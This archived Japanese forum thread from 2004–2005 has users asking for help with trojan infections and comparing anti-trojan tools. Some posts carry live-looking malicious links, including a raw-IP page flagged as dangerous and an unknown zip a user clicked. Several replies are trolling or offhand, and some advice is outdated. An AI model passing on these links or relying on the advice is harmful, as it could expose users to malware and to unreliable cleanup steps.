546 ：名無しさん＠お腹いっぱい。 ：04/11/22 07:35:04: 【1-20を読んだか】
【使用OS】
【WindowsUpdateしてるか】
【AntiVirus/AntiTrojanは何を使っているか】
【ちゃんとUpdateしてるか】
【スキャンした結果（ウイルス/トロイ名・発見場所）】
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】
【何をしたらそんなことになったのか】
【これまでにとった措置】
【その他の質問】
547 ：名無しさん＠お腹いっぱい。 ：04/11/22 19:19:06: Prevx has detected 143 potential intrusion attacks on this system.

だそうな　導入4日で143ね
FWにはZA使ってるがその間に
「37個の進入をブロックしました」　
･････
548 ：名無しさん＠お腹いっぱい。 ：04/11/23 03:15:01: ウィルスバスターのオンラインスキャンで
TROJ_QHOST.Hというのが検出されたんですが
データベース等検索してもヒットしません。
TROJ_QHOST.Nというのはありましたが。。
549 ：名無しさん＠お腹いっぱい。 ：04/11/23 13:54:48: Registry Protのアンインストールってどうやるんでしょうか？
情けない質問で申しわけない＿|￣|○
550 ：名無しさん＠お腹いっぱい。 ：04/11/23 14:19:54: >>549
RPADMIN.EXE
551 ：名無しさん＠お腹いっぱい。 ：04/11/23 14:43:16: >>550
ありがとうございます（ ´∀｀）
552 ：名無しさん＠お腹いっぱい。 ：04/11/23 20:40:53: トロイ対策にソフトをインストしようと思うのですが、
このスレでよく名前の出ているewidoとa2はどちらを
導入した方がよいのでしょうか？

双方インストした方がセキュリティ面では安全なのでしょうか。
アドバイスお願いいたします。
553 ：名無しさん＠お腹いっぱい。 ：04/11/23 23:21:23: >>552
ewidoはちゃんとアンインスコできない
とか書いてるのを見かけたので
俺はa2しか入れてないな。
554 ：名無しさん＠お腹いっぱい。 ：04/11/24 12:43:46: >>553
間違いないよ、俺、今日アンインスコしたけれど
ゴミが残ってるよ。
ewidoで検索かけたら出てきたけど、それだけじゃないみたいだ。
最近では一番癖の悪いソフトだと思ったよ。
んで、現在は俺もa2のみ。
555 ：名無しさん＠お腹いっぱい。 ：04/11/24 16:06:05: >>552
両方いれればいいんじゃないかと
556 ：名無しさん＠お腹いっぱい。 ：04/11/24 16:15:00: じゃあ再インスコまでewidoは放っておくか・・・。
557 ：名無しさん＠お腹いっぱい。 ：04/11/24 23:15:07: ＯＳのサービスに二種類登録されてるけれど
無効にして、ewidoをアインスコし、ewidoで検索掛けて
出てきた物を削除したが、サービスに登録が残ったままになっとるよ。
レジストリーもクリーナーでクリーニングしたんだけど駄目。
手動で探してゴミを削除するしかないみたいですね。
558 ：名無しさん＠お腹いっぱい。 ：04/11/25 11:28:24: >>557 DriverWalker ttp://www001.upp.so-net.ne.jp/yamashita/product/dw/
サービス削除楽だよ。
559 ：557 ：04/11/25 11:28:50: DriveDiet XP Professionalのソフトでサービスを検索して
削除成功。
之で、サービスに登録されていたewidoの２種類を完全削除できました。
これで、もうゴミは無いと思います。
二度と入れんぞ糞そewido
560 ：名無しさん＠お腹いっぱい。 ：04/11/25 11:33:04: >>558
サンクスです。
561 ：名無しさん＠お腹いっぱい。 ：04/11/26 00:40:15: 【1-20を読んだか】 sir,yes,sir!
【使用OS】ウインドウズＸＰプロフェッソナル
【WindowsUpdateしてるか】サービスパック２は未だ様子見
【AntiVirus/AntiTrojanは何を使っているか】ノートンアンチウイルス、シマンテック
やウイルスバスターサイトでネットスキャンもよくやっている
【ちゃんとUpdateしてるか】 sir,yes,sir!
【スキャンした結果（ウイルス/トロイ名・発見場所）】出てきません
【別のオンラインスキャンしたならその結果は】出てきません
【症状を具体的に、分かる限りすべて書く】１７０００portを1秒間に20回使用される
【何をしたらそんなことになったのか】リアル友人にエロアニメもらった、あとアメリカの
ネトゲサイトを回ってみたり（notエロ）、
【これまでにとった措置】全スキャン5回（ノートン）ネットスキャンというスキャンを試した
【その他の質問】
リバーストロージャンの疑いが高いです。検出してレジストリからも消してしまいたいです
562 ：名無しさん＠お腹いっぱい。 ：04/11/26 01:21:29: ＞リバーストロージャンの疑いが高いです
はぁ？知ってるならやれば？
563 ：名無しさん＠お腹いっぱい。 ：04/11/26 02:34:43: ここに一杯有るね。
ttp://f57.aaa.livedoor.jp/~kumakuma/tool/virus.html
Spy-Ad ExterminatorってAd-awareSEよりよさげな感じ。
564 ：名無しさん＠お腹いっぱい。 ：04/11/26 10:57:08: >>561
＞１７０００portを1秒間に20回使用される
外から？中から？
565 ：名無しさん＠お腹いっぱい。 ：04/11/26 20:10:41: >>561【1-20を読んだか】 sir,yes,sir!

嘘つくな
>>1セキュリティー関係で質問ある方は下記へどうぞ。
ここで質問しろなんて書いてないぞ。
566 ：名無しさん＠お腹いっぱい。 ：04/11/26 22:07:08: >>563
a2ないのね・・・・
567 ：名無しさん＠お腹いっぱい。 ：04/11/27 14:24:18: >>557
>サービスに二種類登録されてるけれど無効にして、ewidoをアインスコし

笑うとこですか？
568 ：名無しさん＠お腹いっぱい。 ：04/11/27 22:40:45: >>567
　　　　(ﾟДﾟ)　(ﾟДﾟ)
　　　(ﾟДﾟ)　　(ﾟДﾟ)　　　　(ﾟДﾟ)(ﾟДﾟ)(ﾟДﾟ)　　　???????
　　　(ﾟДﾟ)　　　(ﾟДﾟ)　　　　　　　　　　(ﾟДﾟ)　　??　　　??
　　(ﾟДﾟ)　　　　　(ﾟДﾟ)　　　　(ﾟДﾟ)(ﾟДﾟ)　　　　　　　??
　　(ﾟДﾟ)　　　　　(ﾟДﾟ)　　　　(ﾟДﾟ)　　　　　　　　　??
　(ﾟДﾟ)　　　　　　　(ﾟДﾟ)　　　(ﾟДﾟ)　　　　　　　　　??
　(ﾟДﾟ)　　　　　　　(ﾟДﾟ)　　　(ﾟДﾟ)
(ﾟДﾟ)　　　　　　　　　(ﾟДﾟ)　(ﾟДﾟ)　　　　　　　　　　??
569 ：名無しさん＠お腹いっぱい。 ：04/11/28 15:41:53: >>567
意味不明な事を書いてんじゃねーよ、ボケ
570 ：名無しさん＠お腹いっぱい。 ：04/12/01 10:37:17: 　　　　　　　　 ,ｲ　　　　│
　　　　　　　　　 //　　　　 |:!
　　　　　　 //,. -/r‐- ､| !
　　　　　　　 /,/　./　|　　_」ﾄ､
　　　　　　　/.＼`/　　|二...-┘ ヽ
.　　　　　 i　　 ,.>､;／ｰ- ､　　　 l
　　　　　　 ! ∠..＿;'＿＿＿_＼　 |
　　　　　　,!ｲく二>,.、 <二＞｀＼.､ヽ.
　　　　／'´レ--‐'ﾉ. `ｰ---- ､　|＼ヽ、
　　　　＼　 `l　　(!"　　　　 Jfヽ!　 `''-;ゝ
　　　　　 `‐､jヽ　ヾﾆﾆ>　　ﾞｲ" }_,,. ‐''´
　　　　　　 `´＼　ｰ　／ ,ィ_}
.　　　　　　　　 |_ `ー ''´　＿｣'
　　　　　　＿,.|　~||｢　￣　人|､.＿
　　,r=＝;"´　　ヽﾐ|||彡　　／　` ｰ`＝=､-､
.　///,ｲ　＿＿_ ヽ|||_,,. ‐''´＿＿＿　　| | | |ヽ
571 ：名無しさん＠お腹いっぱい。 ：04/12/01 19:05:49: Swat It!でスキャンしたらLiveMakerというソフトのBmpToGale.exeで
Latinus v1.4.clというトロイが検出されました。
a2やad-aware、Spybotでは検出されませんでした｡

どういうトロイなのか知っている人いないでしょうか。お願いします｡
572 ：名無しさん＠お腹いっぱい。 ：04/12/03 02:03:49: トロイ対策はBitdefenderでいいですね？
573 ：名無しさん＠お腹いっぱい。 ：04/12/03 04:37:16: このスレを全部読めばそんな風には思わん。
574 ：名無しさん＠お腹いっぱい。 ：04/12/04 10:44:50: >>571
バックドア系のハックツール
575 ：名無しさん＠お腹いっぱい。 ：04/12/04 20:46:39: >>570
木馬繋がりか。
576 ：名無しさん＠お腹いっぱい。 ：04/12/06 21:18:19: フリーはa2、ewodo、Swat Itだけでしょうか？
577 ：571 ：04/12/06 21:29:31: >>574
ありがとうございます
578 ：名無しさん＠お腹いっぱい。 ：04/12/07 15:18:11: TROJ_AGENT.BR くらった・・・・(￣へ￣|||)
DHCP認識しなくなって XP SP2 導入後
WINカタログをリセットさせてようやく復旧
4時間もかかった・。・ﾟ(´д⊂)ﾟ･｡･

しっかりしてくれよVB
579 ：名無しさん＠お腹いっぱい。 ：04/12/07 17:27:42: >>578
我々に関心があるのは、なにしていてTROJ_AGENT.BRをくらったか、なんだが。
580 ：名無しさん＠お腹いっぱい。 ：04/12/07 19:46:10: トロイが入っても
ノートン買えば大丈夫
581 ：名無しさん＠お腹いっぱい。 ：04/12/07 20:09:20: >>579
　　　　　　　　　マイヤヒー！マイヤフー！
　　　　　＼＼　マイヤホー！　　　　　　　／／
　+　　　+　＼＼　マイヤハッハー！！／／+
　　　　　　　　　　　　　　　　　　　　　　　　　　　　+
.　　　+　　／■＼　　／■＼　／■＼　　+
　　　　　　（　´∀｀∩（´∀｀∩）（　´ー｀）
　+　　（(　（つ　　　ノ（つ　　丿　（つ　　つ　)）　　+
　　　　　　ヽ　（　ノ（　ヽノ　　　）　）　）
　　　　　　　（＿）し'　し（＿）　（＿）＿）

ﾏｲﾔﾋ-ﾌﾞｰﾑの火付け役になったフラッシュ
http://pinkmelon.net/maiyahi/maiyahi.htm

記憶が定かでないがたぶん↑ここのリンク先（踏まないようにﾈ・・ここは大丈夫なんだけど）

>>580
なんかここ半年ほどシマンテックのほうが対応いいよね
のりかえようかなぁ・・・・・・・
582 ：名無しさん＠お腹いっぱい。 ：04/12/08 23:38:51: zg009174.ppp.dion.ne.jp
583 ：名無しさん＠お腹いっぱい。 ：04/12/09 11:39:46: ん？
584 ：名無しさん＠お腹いっぱい。 ：04/12/10 10:17:59: ↓初心者に分かりやすい駆除方法が載っています
ttp://service1.symantec.com/SUPPORT/INTER/navjapanesekb.nsf/jp_docid/20030926221125958
585 ：名無しさん＠お腹いっぱい。 ：04/12/10 11:08:29: ↑download trojan の場合
586 ：名無しさん＠お腹いっぱい。 ：04/12/12 21:05:32: 結局、一番検出力が高くて軽いのはどれ？
587 ：名無しさん＠お腹いっぱい。 ：04/12/12 22:09:50: フリーはa2、ewodo、Swat Itだけでしょうか？(´･ω･｀)
588 ：名無しさん＠お腹いっぱい。 ：04/12/13 17:32:29: 　
589 ：名無しさん＠お腹いっぱい。 ：04/12/15 17:19:00: アンチキーロガーもこのスレでいいんでしょうかねぇ
590 ：名無しさん＠お腹いっぱい。 ：04/12/15 20:25:03: キーロガーもトロイの一種だからここでいいだろ
591 ：名無しさん＠お腹いっぱい。 ：04/12/15 20:29:57: >>587
つAranea Spywizard　ttp://www.freeimagebrowser.com/
つSpy-Ad Exterminator　ttp://www.oreware.com/
592 ：名無しさん＠お腹いっぱい。 ：04/12/16 17:58:19: エロサイト巡ってたらトロイもらった
593 ：名無しさん＠お腹いっぱい。 ：04/12/17 00:36:14: エロイトロイ
594 ：名無しさん＠お腹いっぱい。 ：04/12/17 00:51:17: インリン・オブ・ジョイ・トロイ
595 ：名無しさん＠お腹いっぱい。 ：04/12/17 07:12:40: >>587
Prevx Home ttp://www.prevx.com/prevxhome.asp
596 ：名無しさん＠お腹いっぱい。 ：04/12/18 10:25:08: >>インリン・オブ・ジョイ・トロイ
大変なことになりそうだな。
597 ：名無しさん＠お腹いっぱい。 ：04/12/20 22:27:45: なんでかgoogleのキャッシュに飛べない、繋がらない…という
変な症状がトロイで出ることありますか？
598 ：名無しさん＠お腹いっぱい。 ：04/12/20 22:49:54: >>597
なんか同じような文をどっかで見かけた
その現象流行ってるのか？
599 ：名無しさん＠お腹いっぱい。 ：04/12/20 23:24:20: 大流行してますよ。
600 ：名無しさん＠お腹いっぱい。 ：04/12/20 23:40:44: >>598
「不正アクセスしてくるIPを…」
http://pc5.2ch.net/test/read.cgi/sec/1092025431/l50
ここの875で報告したんだが
「釣り」だと言われていまったよ('A`)
601 ：名無しさん＠お腹いっぱい。 ：04/12/21 00:19:20: 875 名前：名無しさん＠お腹いっぱい。[] 投稿日：04/12/19(日) 00:30:29
詳細: ルール「Ultor's トロイの木馬のデフォルト遮断」が www.google.co.jp(64.233.189.104)、1234 を遮断しました。
インバウンド TCP 接続
ローカルアドレス、サービスは (*************(192.168.1.2)、1234)
リモートアドレス、サービスは (www.google.co.jp(64.233.189.104)、http(80))

（・３・）アルェ～？　←釣り扱いの原因はこれ
602 ：名無しさん＠お腹いっぱい。 ：04/12/21 22:19:21: すいません。これ踏んでしまったんですけどなんだか分かりません
鑑定していただけませんか？
ttp://cgi28.plala.or.jp/ll/lll/img20041218200143.zip
603 ：名無しさん＠お腹いっぱい。 ：04/12/21 22:29:17: ↑Not Found
604 ：名無しさん＠お腹いっぱい。 ：04/12/22 15:32:11: ＴＲＯＪ　ＳＭＡＬＬ　ＧＵってのくらったんですけど、バスターでもＥＷＩＤＯでも駆除も、隔離もできません。復元オフにしてセーフで削除して再起動してもまた元に戻ってます。どうすればいいでしょうか？
605 ：名無しさん＠お腹いっぱい。 ：04/12/27 00:27:09: TROJ XTRAY Aってのがあるみたいなんですがどうすればいいんでしょう…
606 ：名無しさん＠お腹いっぱい。 ：04/12/27 01:18:43: >>605
マルチしやがったな。もう答えねえ。
607 ：名無しさん＠お腹いっぱい。 ：04/12/28 02:52:05: >>605
２階の窓から投げ捨てろ
608 ：名無しさん＠お腹いっぱい。 ：04/12/31 09:35:11: >>595
これ入れて2ヵ月
Prevx has detected 3816 potential intrusion attacks on this system
ﾊｧ?
気にしな～ぃ　気にしな～ぃ　気にしな～ぃんだよ～♪
609 ：【大凶】 - 【1164円】：05/01/01 11:45:30: 明けおめ
610 ：名無しさん＠お腹いっぱい。 ：05/01/01 11:46:57: ぐぇー　と、言うことで
もう一度引き直し　明けおめ
611 ：【凶】 - 【1209円】：05/01/01 11:47:57: 失敗　＿|￣|○

明けおめ
612 ：【凶】 - 【1817円】：05/01/01 11:48:49: あまりにも気分が悪いので　また

明けおめ
613 ：名無しさん＠お腹いっぱい。 ：05/01/01 11:51:59: アンタ最悪だなｗ
614 ：名無しさん＠お腹いっぱい。 ：05/01/01 16:59:09: >>609-612
・・・山崎邦正ばりに笑いの神が降りて来てるな、生㌔ｗ
615 ：【末吉】【485円】：05/01/01 21:19:06: !omikuji!dama
616 ：名無しさん＠お腹いっぱい。 ：05/01/01 22:16:12: トロイ関係ではどのソフトが一番(・∀・)ｲｲの？
617 ：名無しさん＠お腹いっぱい。 ：05/01/02 00:15:40: >>616
素直に言えば
一番がTiny、2番がSSM あとは気休め程度で大差ない。
618 ：名無しさん＠お腹いっぱい。 ：05/01/02 00:20:11: ↑補足
当然アンチウイルスを入れた上でさらに補強すればの話。
619 ：名無しさん＠お腹いっぱい。 ：05/01/03 20:01:33: 未知のトロイ、ワームやウイルスをブロックするには
確かに、Tinyの砂箱は強力だがVirtual PCなど使って怪しいアプリは仮想上で
実行してみるのも効果的だと思う。
されに、どうにもならないような問題が起きてしまった時はバックアップツール
を使ってシステムのイメージから書き戻せる体制があれば心強いよな。
620 ：名無しさん＠お腹いっぱい。 ：05/01/04 08:14:21: googleのキャッシュに飛ぼうとすると、トロイをブロックしますた、と
出た後でうんともすんとも…という状態になります。
ノートンアンチウィルスやネットセキュリティではなんも出来んということ？？
621 ：名無しさん＠お腹いっぱい。 ：05/01/04 12:40:06: >>620
普通そんなことにはならない。というか、もしそのような障害が出れば
大騒ぎになるのでは？
少なくとも漏れは無問題だ。
622 ：名無しさん＠お腹いっぱい。 ：05/01/04 18:49:35: >621
うっ、ありがとうございます。
ひゃーどうしたらいいのー検索しようにも…！もうダメ？！と焦って、
勝手に絶望してますた。
ちょっと落ち着いて、初めから勉強してみます。
623 ：名無しさん＠お腹いっぱい。 ：05/01/07 00:34:43: Ewido Security Suite、Tauscan、a2を使ってみたがどれも決定打に欠けるような気がする。
一つ選ぶとしたらTauscanかなあ。皆さんはどうですか？

それともトロイ系はやはりノートンが鉄板なのかなあ・・・
624 ：名無しさん＠お腹いっぱい。 ：05/01/07 00:50:26: ProcessGuardが 3になってからかなり評判がいいらしい。
625 ：名無しさん＠お腹いっぱい。 ：05/01/07 01:43:08: アンチウイルス、アンチトロイ系で100％と言えるものはないが
初心者のうちは、新種のウイルスやトロイに対応が少しは早い
ノートンのアンチウイルスが無難だと言えるかな。
あとは、各自の環境やスキルに応じてセキュリティ環境の構築が
微妙に違ってくると言うのが流れだな。
626 ：名無しさん＠お腹いっぱい。 ：05/01/07 16:44:51: >>624
ProcessGuard入れてるんだったら感想を聞かせて欲しい。
漏れは2年ぐらい前に2回ほどProcessGuard試したんだが起動段階でハング
したので、その当時は日本語環境では使えないと思った。
627 ：名無しさん＠お腹いっぱい。 ：05/01/07 20:05:25: セキュリティの知識は全くと言っていいほど2chから入手したんで市販のソフトって使ったことないのよね。
ノートンとか使い勝手良いのかしら。
628 ：名無しさん＠お腹いっぱい。 ：05/01/07 21:24:25: 雑音の釣り
629 ：名無しさん＠お腹いっぱい。 ：05/01/12 23:20:27: すいません、AVGが動かなくなった為avastをいれたのですが
C\RESTORE\TEMPの.CPYにてTrojan-genが検出されました。
変なEXE動いてるかみても怪しい物はなく、隠しファイルに入ってる
物なので消しちゃいけないかと思い、ご教授して頂きたい。
630 ：名無しさん＠お腹いっぱい。 ：05/01/12 23:39:26: お得意の誤検出じゃないの？
一応他のでも試してみては？BitDefenderとかAntidoteとか
631 ：名無しさん＠お腹いっぱい。 ：05/01/12 23:58:04: やっぱり誤検出でしょうか。
ありがとうございます、自信がなかったもので。
一応他で試して又報告させていただきます。
632 ：名無しさん＠お腹いっぱい。 ：05/01/13 02:41:35: Antidoteで今までやりました。
結果は綺麗なもんでした・・・・
ありがと。おやすみ('A`)ﾉｼ
633 ：名無しさん＠お腹いっぱい。 ：05/01/26 03:26:45: さっきウイルスバスターを入れて初めて感染していたことに気付きました。
知らないうちに情報が漏れたりしてるんでしょうか・・・
634 ：名無しさん＠お腹いっぱい。 ：05/01/27 17:35:31: 気付いたときには漏れ漏れだったなんて事はよくあること。
でもまぁなんだ、漏れてなかったと自己暗示すればいいのさ。
635 ：名無しさん＠お腹いっぱい。 ：05/02/01 19:45:49: eScanのスレってないんだね(´･ω･｀)
636 ：名無しさん＠お腹いっぱい。 ：05/02/04 01:53:11: >>635
(＾＾)y━~~
637 ：名無しさん＠お腹いっぱい。 ：05/02/12 21:15:40: ほ「
638 ：名無しさん＠お腹いっぱい。 ：05/02/13 16:50:47: トロイってexeを実行しない限り感染しないんですか？
639 ：名無しさん＠お腹いっぱい。 ：05/02/13 16:57:16: >>638
いや、セキュリティホールが残っていたら、ウェブサイト経由でインストールされちまう
だから、ウィンドウズアップデートする
640 ：名無しさん＠お腹いっぱい。 ：05/02/13 17:06:03: >>639
なるほどありがとうございます。
ノートンでトロイが検出されてしまったので。
削除のみしたのですがなんか心配になって。
ウインドウズアップデートもしてみます。
641 ：名無しさん＠お腹いっぱい。 ：05/02/13 18:33:28: >>639
なるほどありがとうございます。
ノートンでトロイが検出されてしまったので。
削除のみしたのですがなんか心配になって。
ウインドウズアップデートもしてみます。
642 ：名無しさん＠お腹いっぱい。 ：05/02/14 17:04:20: とても納得したようだね
643 ：名無しさん＠お腹いっぱい。 ：05/02/15 23:00:47: >>638
あまい、もうちょっと勉強したほうがいいよダウンロードして勝手に実行するのもあるよ
644 ：名無しさん＠お腹いっぱい。 ：05/02/15 23:02:51: ホームページ閲覧　－＞トロジャン感染ー＞ダウンロードー＞実行
これら自動的に行うのがダウンロード　トロジャン
645 ：名無しさん＠お腹いっぱい。 ：05/02/15 23:04:50: ダウンロード　トロジャンにやられると何もしてないのにＩＥは勝手に何かにアクセスして通常動作は著しく重くなる
646 ：名無しさん＠お腹いっぱい。 ：05/02/15 23:16:11: >>643-645今日どこかのｽﾚでで見かけたｱﾌｫだ(　´,_ゝ｀)ﾌﾟｯ
647 ：名無しさん＠お腹いっぱい。 ：05/02/16 04:39:46: 質問です。
jpgなどの画像ファイルにトロイがバインドされていた場合どうなるのですか？
画像を表示しただけで起動してしまうのでしょうか？
動画にバインドされていた場合もプレビューが表示された時点で起動してしまうのでしょうか？
648 ：名無しさん＠お腹いっぱい。 ：05/02/16 05:15:18: >>647
http://e-words.jp/n/JPEG.html
一般の人はWindowsのセキュリティパッチを欠かさず当てていれば過度に心配
する必要もないと思う。
トロイなどに利用される脆弱性は一般の人が気付かなくても研究者によって
絶えずチェックされて見つかれば警告→修正パッチリリースという流れだから
蔓延する前に穴を突かれてトロイにやられる人は余程ツキがないと思った
ほうがいいと思う。
649 ：名無しさん＠お腹いっぱい。 ：05/02/16 05:23:02: （追加）
それよりも、初心者が気をつけるべきなのは、HTMファイルを単にJPGなどの拡張子に
変えてWeb上に置いてあるものを画像だと思ってクリックしてアダルトサイトなどに繋げられて
スクリプト操作でスパイウェアやトロイを仕込まれることかと。
これはJavaScriptやActiveXをむやみに許可しないことで防げます。
650 ：名無しさん＠お腹いっぱい。 ：05/02/16 07:31:19: 今、困っていることがあります。助けて下さい。
このサイトを踏んだら ttp://69.50.161.142/inc/nan7.html （←危険！！）
JAVA_BYTEVER.Aというスパイウェアに感染してしまいました。
当時Windows XPでSP2はインストールしていませんでした。
慌ててSP2をインストールし、マイクロトレンドのウィルスバスター2005の無償版で
とりあえずJAVA_BYTEVER.Aは隔離できたようなんですが、まだ解決していない問題がいくつかあります。
1.ホームページを「about:blank」にしているにもかかわらず、IEを開くと
ttp://www.geocities.jp/sutesaite/img/spyware.jpg
というサイトが開きます。 [uninstall homepage]をクリックしても
ttp://www.geocities.jp/sutesaite/img/stopzilla.JPG という広告サイトに移ります。
2.時折勝手に ttp://www.geocities.jp/sutesaite/img/site.JPG というアダルトサイトのポップアップが開きます。
3.時折勝手に ttp://www.geocities.jp/sutesaite/img/wsc.jpg というメッセージが開き、[YES]ボタンを押すと
ttp://www.geocities.jp/sutesaite/img/wsc2.jpg というサイトに移ります。
一見マイクロソフトのページのように見えますが実はそうではないようで、
[Download Recomemnded Software]をクリックすると
ttp://www.geocities.jp/sutesaite/img/stopzilla.JPG という広告サイトに移ります。
4.時折勝手に ttp://www.geocities.jp/sutesaite/img/risk.JPG というサイトが開きます。
バルーンをクリックすると ttp://www.geocities.jp/sutesaite/img/fightspyware.JPG
というのが表示され、[REMOVAL TOOLS]をクリックしても
ttp://www.geocities.jp/sutesaite/img/stopzilla.JPG という広告サイトに移ります。
使用OS:Windows XP Home Edition
使用ブラウザ:IE6.0.2900.2180.xpsp_sp2rtm.04083-2158
使用PC:DELL DEMENSION 8300
よろしくお願いします。
651 ：名無しさん＠お腹いっぱい。 ：05/02/16 07:53:42: >>650
ウィルス情報＆質問　総合スレッド☆Part27
http://pc5.2ch.net/test/read.cgi/sec/1104587430/898

（・∀・）ﾆﾔﾆﾔ
652 ：名無しさん＠お腹いっぱい。 ：05/02/18 09:11:56: 今度Tauscanを使ってみた
653 ：名無しさん＠お腹いっぱい。 ：05/02/18 13:00:16: どなたか、ＴＲＯＪ　ＡＧＥＮＴ　ＫＸ　に感染した人いますか?
ぐぐってみても、ＫＸは見つからないんです。
ファイルを削除しても削除してもリアルタイム検索に引っかかります…
654 ：名無しさん＠お腹いっぱい。 ：05/02/18 13:14:50: >>653
別名Troj/Codeine-A
http://www.sophos.com/virusinfo/analyses/trojcodeinea.html

検出ファイルに関連があるサービスがここに登録されていると思われる。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\
655 ：653 ：05/02/18 13:23:55: >>654
ありがとうございます！
ただ、そこのアンチウイルスのＩＤＥが開けないんですが…
656 ：名無しさん＠お腹いっぱい。 ：05/02/18 13:26:00: >>655
はぁ？解説見て手動で退治するんだよ。
657 ：名無しさん＠お腹いっぱい。 ：05/02/18 21:32:51: only capable of finding a limited number of Trojans. In addition, most of them o
nly offer cursory support should the application malfunction
, for example by locking up every time you boot your computer. Neither do they o
ffer a user-friendly interface. Of course, any protection is
better than none at all, but do you really want to spend hours on end learning h
ow to use such a tool? And can you really be sure that your
system is properly protected afterwards?

In that respect, Tauscan offers you a user-friendly tool that runs without any u
ser intervention and can be installed without the need for a
ny computer literacy on the part of the user.
Installing Tauscan also ensures that your system remains fully protected against
new strains that appear almost daily by allowing you to
download the latest updates directly from our web site.
658 ：名無しさん＠お腹いっぱい。 ：05/02/18 21:33:56: Tauscan vs. Anti-Trojan Software

Computer enthusiasts developed most of the popular anti-Trojan type of programs
currently available that are in the same class and price range of Tauscan. Altho
ugh they do offer some protection against Trojan viruses, they lack the expertis
e that comes with a product developed by a company that specializes in anti-Troj
an technology. A great many of these utilities lack proper protection because th
ey are only capable of finding a limited number of Trojans. In addition, most of
them only offer cursory support should the application malfunction, for example
by locking up every time you boot your computer. Neither do they offer a user-f
riendly interface. Of course, any protection is better than none at all, but do
you really want to spend hours on end learning how to use such a tool? And can y
ou really be sure that your system is properly protected afterwards?

In that respect, Tauscan offers you a user-friendly tool that runs without any u
ser intervention and can be installed without the need for any computer literacy
on the part of the user.

Installing Tauscan also ensures that your system remains fully protected against
new strains that appear almost daily by allowing you to download the latest upd
ates directly from our web site.
659 ：名無しさん＠お腹いっぱい。 ：05/02/18 21:38:24: ハイフネーションもせずに、適当にぶった切りかよｗ
おまけに切る箇所も適当ってｗ

さしずめお前馬鹿だな　>>657-658
660 ：名無しさん＠お腹いっぱい。 ：05/02/18 22:07:31: ウイルスの名前だけでも教えてください
【使用OS】Windows Xp Pro
【WindowsUpdateしてるか】最近してない
【使用AntiVirusソフト】AVG7.0 （確認できない状態なので細かくはわかりません）
【AntiVirusをUpdateしてるか】してる
【ウイルススキャンの結果】脅威なし
【オンラインスキャンしたなら結果】してません。
【症状、具体的に分かる限りすべて書く】画面に「♂♀」がでてあえぎ声がする
【何をしたらそんなことになったのか】友人から送られたzip解凍後「偽装解除.bat」を踏んでしまった
【これまでにとった措置】batファイルを踏む前にスキャンしたものの脅威なしと出たので実行。上記の症状となりCtrl+alt+Delもきかない状態に。
その後、セーフモードで起動し、本体と思れるものを c\windows\system32 から消したところ、♂♀とあえぎ声はでなくなりましたが、exe系が片っ端から実行できません。
なので、窓の社なども起動できません。タスクトレイも時計しか表示されていません。
『regedit』も立ち上がらないのですが、再インストールしか方法はないのでしょうか？
661 ：名無しさん＠お腹いっぱい。 ：05/02/18 22:11:45: あのぅ～トロイとウィルスとスパイウェアはどうちがうんですか？
662 ：名無しさん＠お腹いっぱい。 ：05/02/18 23:56:15: Trojan dropperというウイルスに感染したようなのですが、
駆除の方法が全くわかりません。自分の駆除ソフトでは対応していないので
自分で駆除する方法を調べていますがわかりません。
どなたかご親切な方がいたら教えてください。よろしくお願いします。
663 ：名無しさん＠お腹いっぱい。 ：05/02/19 00:08:28: http://cyan.moo.jp/yado/index.html
664 ：名無しさん＠お腹いっぱい。 ：05/02/19 00:21:36: >>650-651

ﾜﾛﾀ
665 ：名無しさん＠お腹いっぱい。 ：05/02/19 11:48:52: >>662
ノートンでスキャンすれば削除可能
666 ：名無しさん＠お腹いっぱい。 ：05/02/20 15:10:41: >>660
この前の俺と一緒だ。トレンドも検知できなかったよ。
俺はバックアップから戻してどうにかした。

テキストファイルを新規作成後、バッチファイルにリネームして
cmd（XPだったので）て入力して保存後、ダブルクリックして実行、
DOS窓が起動したら、EXEを直接実行すると起動できるものもあった。

次回のために直せたら教えてね。
667 ：名無しさん＠お腹いっぱい。 ：05/02/23 14:50:53: パソコンを再起動したら、真っ黒い画面に「～のファイルが見つからないか壊れてます」みたいな感じのメッセージがでてた。
しかたなくリカバリーしたんだけど、サウンドデバイスがこわれるわ、メルブラのキャラの動きが遅いわでもうサイアク！

・・・ウイルスバスターで検索したら、「TORJ_SMALL.SN」ってでたんだけどもしかしてこれが原因？
668 ：名無しさん＠お腹いっぱい。 ：05/02/23 17:08:35: >>667
完全復活！以上！
669 ：名無しさん＠お腹いっぱい。 ：05/02/24 04:14:17: >>667-668
御洒落さんだね！
670 ：名無しさん＠お腹いっぱい。 ：05/02/24 04:19:50: WindowsXPです。
ウィルス検索ソフトのANTIDOTEで感染ファイルが見つかりました。
C:\Program Files\Windows Media Player\wmplayer.exe.tmp　が、
Trojan-Downloader.Win32.Agent.cm　に感染との事です。

対処法を探そうと検索しましたが、シマンテックとトレンドマイクロでは
Trojan-Downloader.Win32.Agent.**　と最後の部分が違うのは数種類有るのですが
最後がcmのは登録されてないようで、分かりませんでした。
両社のオンラインスキャンも試しましたが、どちらも結果は感染無しになります。

この場合、単にwmplayer.exe.tmpファイルを削除するだけで良いでしょうか？
一応このファイル名でレジストリを検索してみましたが何も有りませんでした。
又、このファイルの作成日時はWindows Media Playerフォルダの他のファイルと同じ
2002/08/02なので（wmplayer.exe.tmpだけが後に更新されてます。）、
元々あるファイルのようですが、削除したらWMPが起動しなくなってしまうのでしょうか？
（wmplayer.exeファイルは別に有ります。）
671 ：名無しさん＠お腹いっぱい。 ：05/02/24 04:38:20: >>670
さっさと削除しろ
万が一起動しなくなっても
ダウンロードセンターからダウンロードすればいいだけ
672 ：名無しさん＠お腹いっぱい。 ：05/02/24 05:23:02: >>670
ANTIDOTEはKasperskyのデータ使ってるからシマンテックやトレンドマイクロよりも信頼性が高い。
それにウイルスに対する命名は各社各様で異なるから名前が違って当り前。
ANTIDOTEで検出したのなら迷わず削除しれ
673 ：名無しさん＠お腹いっぱい。 ：05/02/24 18:58:50: >>669
・・・・・なんで？？
674 ：名無しさん＠お腹いっぱい。 ：05/02/24 19:19:10: ANTIDOTE
削除もできたらなぁ(´･ω･｀)
675 ：名無しさん＠お腹いっぱい。 ：05/02/24 19:44:30: 削除できねーなら使う意味ねーじゃん
676 ：名無しさん＠お腹いっぱい。 ：05/02/25 03:02:25: 手動で削除すりゃ良いだけの話
677 ：名無しさん＠お腹いっぱい。 ：05/02/25 03:29:03: どうしてこんなにマトモに引っ掛かる馬鹿が多いんだろうか。
